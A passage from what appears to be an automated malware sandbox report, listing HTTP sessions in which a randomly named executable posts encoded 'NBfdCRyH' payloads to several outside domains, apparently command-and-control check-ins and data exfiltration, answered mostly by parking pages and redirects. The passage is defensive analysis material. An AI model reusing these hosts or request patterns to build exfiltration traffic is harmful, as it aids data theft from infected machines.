                                                                                                                                  Referer: http://www.deeplungatlas.org/57zf/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Ascii: NBfdCRyH=cQ/jsRtgtxwgFcVkQMJUPWLr3ldZ5D1AYO6mtt7zZiTOWb571JgsM1TueIm8BK+AlDipjT1vXwdfXMFv7VKM1YaJZOvcLnsYfKpdCQ9FwJ3TwjWMGywSxGN8IYNFOgDEb6vw8l92mUhLPkrsfj9zrtuXJQ2jlCgbGniPdRaZjIrs9gIbmOnVZirBDh4G4XvR9g==
                                                                                                                                  Nov 7, 2024 12:53:29.231208086 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 07 Nov 2024 11:53:29 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  X-Powered-By: PHP/8.1.29
                                                                                                                                  Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                                                                  Nov 7, 2024 12:53:29.231224060 CET | 1236 | IN
                                                                                                                                  Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                                                                                                  Nov 7, 2024 12:53:29.231231928 CET | 1236 | IN
                                                                                                                                  Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                                                                                                  Nov 7, 2024 12:53:29.231241941 CET | 636 | IN
                                                                                                                                  Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                                                                                                                  Nov 7, 2024 12:53:29.231249094 CET | 1236 | IN
                                                                                                                                  Data Ascii: ges include everything you need to get started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_
                                                                                                                                  Nov 7, 2024 12:53:29.231257915 CET | 242 | IN
                                                                                                                                  Data Ascii: ><br /><p><a href="https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  6 | 192.168.2.4 | 49903 | 194.9.94.85 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:53:30.915663004 CET | 629 | OUT | POST /57zf/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.deeplungatlas.org
                                                                                                                                  Origin: http://www.deeplungatlas.org
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 225
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.deeplungatlas.org/57zf/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Ascii: NBfdCRyH=cQ/jsRtgtxwgH4pkAfRUYGLqr1dZiz1EYO2mtofjaW/OX+F70N0sP1TuVomDMq+xlEqXjQtvXwZfXJhv6jCP1IaLWuveW3sYfKpdCQZvwJvTwzmMUDwTyGN/B4NFKgDAb6vC8nJQmXZLPk7sGXRwlduRXg3GjHNoOUuOdRetrp3gxGFB3/GCLiPyemxy1USYmh7HsD66jKlkkNzpoKRNMpE=
                                                                                                                                  Nov 7, 2024 12:53:31.750181913 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 07 Nov 2024 11:53:31 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  X-Powered-By: PHP/8.1.29
                                                                                                                                  Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                                                                  Nov 7, 2024 12:53:31.750207901 CET | 1236 | IN
                                                                                                                                  Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                                                                                                  Nov 7, 2024 12:53:31.750221968 CET | 424 | IN
                                                                                                                                  Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                                                                                                  Nov 7, 2024 12:53:31.750233889 CET | 1236 | IN
                                                                                                                                  Data Ascii: <div class="divider"></div><h2>Register domains at Loopia</h2><p>Protect your company name, brands and ideas as domains at one of the largest domain providers in Scandinavia. <a href="https://www.loopia.com/domainna
                                                                                                                                  Nov 7, 2024 12:53:31.750252008 CET | 1236 | IN
                                                                                                                                  Data Ascii: web&utm_content=dns">Read more at loopia.com/loopiadns </a></p> <div class="divider"></div><h2>Create a website at Loopia - quickly and easily</h2><p>Our full-featured web hosting packages include everything you need
                                                                                                                                  Nov 7, 2024 12:53:31.750273943 CET | 454 | IN
                                                                                                                                  Data Ascii: ><a href="https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb"><img src="https://static.loopia.se/shared/logo/logo-loopia-white.svg" alt="Loopia AB" id="logo" /></a><br /><p><a href="https:/


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  7 | 192.168.2.4 | 49917 | 194.9.94.85 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:53:33.459759951 CET | 10711 | OUT | POST /57zf/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.deeplungatlas.org
                                                                                                                                  Origin: http://www.deeplungatlas.org
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 10305
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.deeplungatlas.org/57zf/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Ascii: NBfdCRyH=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 [TRUNCATED]
                                                                                                                                  Nov 7, 2024 12:53:34.461174965 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 07 Nov 2024 11:53:34 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  X-Powered-By: PHP/8.1.29
                                                                                                                                  Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                                                                  Nov 7, 2024 12:53:34.461189985 CET | 212 | IN
                                                                                                                                  Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="init
                                                                                                                                  Nov 7, 2024 12:53:34.461204052 CET | 1236 | IN
                                                                                                                                  Data Ascii: ial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/s
                                                                                                                                  Nov 7, 2024 12:53:34.461215973 CET | 1236 | IN
                                                                                                                                  Data Ascii: started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="div
                                                                                                                                  Nov 7, 2024 12:53:34.461226940 CET | 1236 | IN
                                                                                                                                  Data Ascii: ith LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more
                                                                                                                                  Nov 7, 2024 12:53:34.461277008 CET | 666 | IN
                                                                                                                                  Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                                                                                  Nov 7, 2024 12:53:34.461313963 CET | 666 | IN
                                                                                                                                  Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  8 | 192.168.2.4 | 49933 | 194.9.94.85 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:53:36.002794981 CET | 339 | OUT | GET /57zf/?NBfdCRyH=RSXDvmZ18TUSGah6EulyS1XswkRToS9Pe8zesMLeYybHc+55raQPDCyvNJ+XALungzCzmhokbhdOc6Bo/lmi/NXFftLLf3QUCIw7GC9Ov73YwEGOSCVy7Hg=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Host: www.deeplungatlas.org
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Nov 7, 2024 12:53:36.833479881 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 07 Nov 2024 11:53:36 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  X-Powered-By: PHP/8.1.29
                                                                                                                                  Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                                                                  Nov 7, 2024 12:53:36.833610058 CET | 212 | IN
                                                                                                                                  Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="init
                                                                                                                                  Nov 7, 2024 12:53:36.833621025 CET | 1236 | IN
                                                                                                                                  Data Ascii: ial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/s
                                                                                                                                  Nov 7, 2024 12:53:36.833668947 CET | 1236 | IN
                                                                                                                                  Data Ascii: started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="div
                                                                                                                                  Nov 7, 2024 12:53:36.833678961 CET | 1236 | IN
                                                                                                                                  Data Ascii: ith LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more
                                                                                                                                  Nov 7, 2024 12:53:36.833692074 CET | 666 | IN
                                                                                                                                  Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  9 | 192.168.2.4 | 49963 | 170.39.213.43 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:53:42.334391117 CET | 603 | OUT | POST /53y2/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.ultrawin23.shop
                                                                                                                                  Origin: http://www.ultrawin23.shop
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.ultrawin23.shop/53y2/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Ascii: NBfdCRyH=g9hy0qy2fRRtF+H9iOcT0xdYt5tjlZZB1N0McRb7kUb3qU2asz4co9GA8cTS9E4bgHYfRsRKT0Rhm9sHpZyyghReaSSCObqwF3C616aNUMsgsqiCeRHlfFNxt/yOQz04H9Xsn1PifRh+QNrSB7tNqNBYNUDCfx3zMgUmw3BlHW3esbXR8FYXs52avDdGXobZfw==
                                                                                                                                  Nov 7, 2024 12:53:42.925740957 CET | 907 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                  Connection: close
                                                                                                                                  content-type: text/html
                                                                                                                                  content-length: 707
                                                                                                                                  date: Thu, 07 Nov 2024 11:53:42 GMT
                                                                                                                                  server: LiteSpeed
                                                                                                                                  location: https://www.ultrawin23.shop/53y2/
                                                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  10 | 192.168.2.4 | 49978 | 170.39.213.43 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:53:44.881557941 CET | 623 | OUT | POST /53y2/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.ultrawin23.shop
                                                                                                                                  Origin: http://www.ultrawin23.shop
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 225
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.ultrawin23.shop/53y2/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Ascii: NBfdCRyH=g9hy0qy2fRRtGf39uN0TxRdbxptj+JZF1NoMcUrRkGv3kW+a+nscmdGAkMSWzk4SgHcpRs9KT0Vhm4IHpuG9gxRYDCSEB7qwF3C616enUKEgtaSCY1bmBVN2s/yOUz08H9X0n37IfU9+QPDSCqtO/dBkC0C+XTf5Lxl89VhRNlXJk9aLt05A+5SpyEUyarmQE5Bi/r+/mNCJdrxEjWpGK7Y=
                                                                                                                                  Nov 7, 2024 12:53:45.465450048 CET | 907 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                  Connection: close
                                                                                                                                  content-type: text/html
                                                                                                                                  content-length: 707
                                                                                                                                  date: Thu, 07 Nov 2024 11:53:45 GMT
                                                                                                                                  server: LiteSpeed
                                                                                                                                  location: https://www.ultrawin23.shop/53y2/
                                                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  11 | 192.168.2.4 | 49994 | 170.39.213.43 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:53:47.428281069 CET | 10705 | OUT | POST /53y2/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.ultrawin23.shop
                                                                                                                                  Origin: http://www.ultrawin23.shop
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 10305
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.ultrawin23.shop/53y2/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Nov 7, 2024 12:53:48.013895988 CET | 907 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                  Connection: close
                                                                                                                                  content-type: text/html
                                                                                                                                  content-length: 707
                                                                                                                                  date: Thu, 07 Nov 2024 11:53:47 GMT
                                                                                                                                  server: LiteSpeed
                                                                                                                                  location: https://www.ultrawin23.shop/53y2/
                                                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 50010 | 170.39.213.43 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 12:53:49.977607012 CET | 337 | OUT | GET /53y2/?NBfdCRyH=t/JS3aCWZhQCYNrIivg5/jofofdJ0Yd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6yqk5yDx2ID7OvEmOK8YK5XOUf59ObJyvEfgA=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Host: www.ultrawin23.shop
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Nov 7, 2024 12:53:50.574702024 CET | 1057 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                  Connection: close
                                                                                                                                  content-type: text/html
                                                                                                                                  content-length: 707
                                                                                                                                  date: Thu, 07 Nov 2024 11:53:50 GMT
                                                                                                                                  server: LiteSpeed
                                                                                                                                  location: https://www.ultrawin23.shop/53y2/?NBfdCRyH=t/JS3aCWZhQCYNrIivg5/jofofdJ0Yd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6yqk5yDx2ID7OvEmOK8YK5XOUf59ObJyvEfgA=&ZpEH9=TjSP5LXXbN8d4
                                                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 50020 | 13.248.169.48 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 12:53:55.636496067 CET | 594 | OUT | POST /ew98/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.sonoscan.org
                                                                                                                                  Origin: http://www.sonoscan.org
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.sonoscan.org/ew98/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Ascii: NBfdCRyH=OTBcpjr66R9YaCj0fJNrfXOqyFzpXu5fl04y86xVQrjd9I6kZlUkDxmm/76VspAxcHTNGgsezcJFKPlJaNoX7xigXtYlkwfuxEemthfkDBesygGe7EF6x+L25Mz2EG955ozZx7m+NmZdQWXmMQ2vc2yVh+5H8Ug0vV1lCDa/FYf+SEz21nH1msMKNtXdSe7iSA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 50021 | 13.248.169.48 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 12:53:58.181579113 CET | 614 | OUT | POST /ew98/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.sonoscan.org
                                                                                                                                  Origin: http://www.sonoscan.org
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 225
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.sonoscan.org/ew98/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Ascii: NBfdCRyH=OTBcpjr66R9YIXz0M+hrUXOtr1zpA+5ll00y8/RFTZ3d8tGkYkUkAxmm3b6UxZAvcHXjGiIezcdFKNtJb+wU4BiiM9Yj5gfuxEemtl3eDA6syxWe7lF54eL1+Mz2VW995ozrx+GYNkhdQSbmMB2wW2yfue5Uxk5QglRxFxSZC5byTC+skWmi0so5QqepfdGrJIWLVEc9BR/vlW4Q+p7PZcA=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 50022 | 13.248.169.48 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 12:54:00.857305050 CET | 10696 | OUT | POST /ew98/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
